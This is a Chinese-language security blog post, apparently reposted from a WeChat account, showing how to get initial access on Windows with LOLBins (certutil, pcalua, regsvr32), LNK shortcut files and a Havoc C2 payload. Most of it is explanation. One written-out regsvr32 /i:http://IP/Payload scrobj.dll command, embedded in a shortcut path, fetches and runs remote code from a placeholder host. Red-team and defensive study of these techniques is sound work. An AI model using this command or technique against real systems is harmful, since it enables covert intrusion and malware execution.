通过 LolBins 和 LNK 执行并初始访问

admin 2024年9月23日01:11:06评论20 views字数 2882阅读9分36秒阅读模式

本文旨在展示通过 LOLBins (Living Off the Land Binaries) 和 LNK 文件进行逃避和执行,这些文件代表了网络攻击者用来绕过传统安全措施并执行恶意负载的复杂技术。

目录

MITRE 攻击(&C)

什么是LNK文件

什么是 LOLBINS

演示

第一种方法

  • 步骤 1:创建有效载荷

  • 步骤2:通过Certutil.exe远程下载payload

  • 步骤3:通过Pcalua.exe执行

  • 步骤 4:组合各部分

第二种方法

  • 步骤 1:利用 LNK 文件

  • 步骤2:将 LolBins 嵌入到 LNK 路径中

  • 步骤3:执行文件

结论

Mitre 攻击(&C)

Mitre 框架提供了所有战术、技术和程序 (TTP) 及其相应子技术的列表,这些子技术以结构良好的形式排列,可用于红队活动。

通过 LolBins 和 LNK 执行并初始访问

什么是 LNK 文件
LNK 文件是 Windows 操作系统中常用的快捷方式,用于快速访问文件、文件夹或应用程序。它们由小图标表示,左下角有一个箭头,表示它们的快捷方式性质。LNK 文件包含对目标文件或应用程序位置的引用,以及其他元数据,例如要显示的图标和执行目标时要传递的任何命令行参数。

用户创建这些快捷方式是为了方便用户,这样他们无需浏览多个文件夹即可访问常用项目。但是,LNK 文件也可能被攻击者操纵,以隐藏恶意活动。通过在 LNK 文件中嵌入恶意命令或指向恶意文件的链接,攻击者可以诱使用户在打开快捷方式时不知不觉地执行有害操作。

通过 LolBins 和 LNK 执行并初始访问

什么是 LolBins
LOLBINS 是“Living Off the Land Binaries”的缩写,指的是操作系统原生的合法二进制文件或可执行文件,但攻击者会利用这些文件进行恶意活动。这些二进制文件通常被传统的安全措施所忽视,因为它们是标准软件套件的一部分,用于合法的系统管理任务。

然而,网络犯罪分子利用 LOLBIN 执行恶意代码,同时逃避检测,因为它们在系统中的存在不太可能触发警报或引起怀疑。通过利用 LOLBIN,攻击者可以在系统的正常运行中伪装他们的行为,这使得安全解决方案很难区分合法行为和恶意行为。

它可以在LOLBAS (lolbas-project.github.io)上找到

演示

在本文中,我们将尝试使用 LOLBINS 和 LNK 文件来绕过防御,或者尝试通过将其滥用于恶意目的来使其更难被发现。

第一种方法

步骤 1:创建有效载荷

我们将使用 HavocC2 创建一个简单的有效载荷,Havoc 是一个开源 C2 框架,旨在简化渗透测试和红队成员生成、编码和执行有效载荷的过程。

该工具是kali自带的,但也可以通过GitHub下载,用户可直接生成可执行文件并运行,达到初始访问的目的:

通过 LolBins 和 LNK 执行并初始访问

步骤2:通过Certutil.exe远程下载payload

Certutil.exe是一款合法的 Windows 命令行实用程序,用于管理证书和加密服务。高级持续性威胁 (APT) 组织利用 certutil.exe 解码和编码 Base64 数据的能力,将其用于恶意目的。

他们经常使用 certutil.exe 下载并执行编码的有效负载,从而绕过传统的安全控制和检测机制。此外,APT 组织可能使用 certutil.exe 将恶意代码隐藏在编码的证书中,或者通过在传输之前对敏感数据进行编码来窃取敏感数据。这种技术使 APT 参与者能够逃避检测并融入正常的网络流量中,使防御者难以检测和缓解他们的活动。

通过 LolBins 和 LNK 执行并初始访问

步骤3:通过Pcalua.exe执行

PCALUA.exe是用于程序兼容性助手的合法 Windows 二进制文件。APT 组织滥用 PCALUA.exe 来秘密执行恶意代码。他们利用其在不触发安全警报的情况下运行可执行文件的能力。通过将恶意二进制文件重命名为良性文件名并将其放置在系统目录中,攻击者会欺骗用户通过 PCALUA.exe 执行它们。

此技术允许绕过用户帐户控制 (UAC) 提示并提升权限。APT组织利用 PCALUA.exe 来保持持久性、逃避检测并以提升的权限执行恶意负载,从而提高其活动的有效性。其合法功能使检测变得具有挑战性,从而使老练的对手能够利用它进行秘密行动。

通过 LolBins 和 LNK 执行并初始访问

步骤 4:组合各部分

LOLBins,即 Living Off the Land Binaries,可用于执行 APT 模拟的各个阶段,模仿复杂的攻击技术,同时逃避检测。

LOLBins,即 Living Off the Land Binaries,可用于执行 APT 模拟的各个阶段,模仿复杂的攻击技术,同时逃避检测。

1.初始访问:利用合法系统二进制文件(如 regsvr32.exe 或 mshta.exe)执行初始负载,通常通过网络钓鱼电子邮件或受感染的网站传递。

2.执行:利用LOLBins执行次要负载,使攻击者能够保持持久性、提升权限或进行侦察。

3.持久性:使用LOLBins建立持久性机制,例如计划任务、Windows 服务或注册表项,确保长期访问受感染的系统。

4.权限提升:利用合法系统二进制文件中的漏洞来提升权限并获得更高级别的访问权限,从而增加攻击者对环境的控制。

5.横向移动:使用 LOLBins 在网络内横向移动,危害其他系统并在整个环境中传播而不引起怀疑。

6.数据泄露:利用LOLBins从受感染的系统中泄露敏感数据,使攻击者能够窃取有价值的信息同时避免被发现。

7.命令和控制:使用 LOLBins 建立命令和控制通道,与受感染的系统进行通信,发出命令并接收来自攻击者基础设施的指令。

8.清理:利用LOLBins掩盖踪迹并消除攻击的痕迹,最大限度地减少法医调查人员发现和归因的机会。

总之,LOLBins 是执行真实且隐秘的 APT 模拟的强大工具,使安全专业人员能够评估和提高其针对复杂对手的防御能力。

通过 LolBins 和 LNK 执行并初始访问

第二种方法

步骤 1:利用 LNK 文件

LNK 文件可能会被滥用,通过在文件中嵌入恶意命令或有效负载,利用 Windows 操作系统的默认行为来获取初始访问和执行。

步骤2:将 LolBins 嵌入到 LNK 路径中

我们可以将命令嵌入路径中,因为操作系统不会验证它并执行它。我们可以使用以下命令:

%windir%system32regsvr32.exe /s /n /u /i:http://IP/Payload scrobj.dll

通过 LolBins 和 LNK 执行并初始访问

步骤3:执行文件

一旦命令输入到 LNK 文件中,我们只需应用并执行该文件即可。快捷方式文件的执行将执行原始有效负载并给予我们初始访问权限:

通过 LolBins 和 LNK 执行并初始访问

结论

简而言之,LOLBins 和 LNK 文件的组合为攻击者提供了绕过安全防御并秘密执行恶意代码的强大手段。

防御这些技术需要采取多层次的方法,包括强大的端点保护、用户教育和对可疑活动的主动监控。

  • 通过 LolBins 和 LNK 执行并初始访问

  • 通过 LolBins 和 LNK 执行并初始访问

其它相关教程

linux恶意软件开发对抗与进程安全管理视频教程(2024最新)

通过 LolBins 和 LNK 执行并初始访问

其它课程

linux文件系统存储与文件过滤安全开发视频教程(2024最新)

通过 LolBins 和 LNK 执行并初始访问

linux高级usb安全开发与源码分析视频教程

通过 LolBins 和 LNK 执行并初始访问

linux程序设计与安全开发

通过 LolBins 和 LNK 执行并初始访问

  • windows恶意软件开发与对抗视频教程

  • 通过 LolBins 和 LNK 执行并初始访问

  • 通过 LolBins 和 LNK 执行并初始访问

  • windows

  • 通过 LolBins 和 LNK 执行并初始访问

  • windows()

  • 通过 LolBins 和 LNK 执行并初始访问

  • USB()

  • 通过 LolBins 和 LNK 执行并初始访问

  • ()

  • 通过 LolBins 和 LNK 执行并初始访问

  • ios

  • 通过 LolBins 和 LNK 执行并初始访问

  • windbg

  • 通过 LolBins 和 LNK 执行并初始访问

  • ()

  • 通过 LolBins 和 LNK 执行并初始访问通过 LolBins 和 LNK 执行并初始访问通过 LolBins 和 LNK 执行并初始访问

  • 通过 LolBins 和 LNK 执行并初始访问

原文始发于微信公众号(安全狗的自我修养):通过 LolBins 和 LNK 执行并初始访问

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月23日01:11:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   通过 LolBins 和 LNK 执行并初始访问http://cn-sec.com/archives/3194270.html

发表评论

匿名网友 填写信息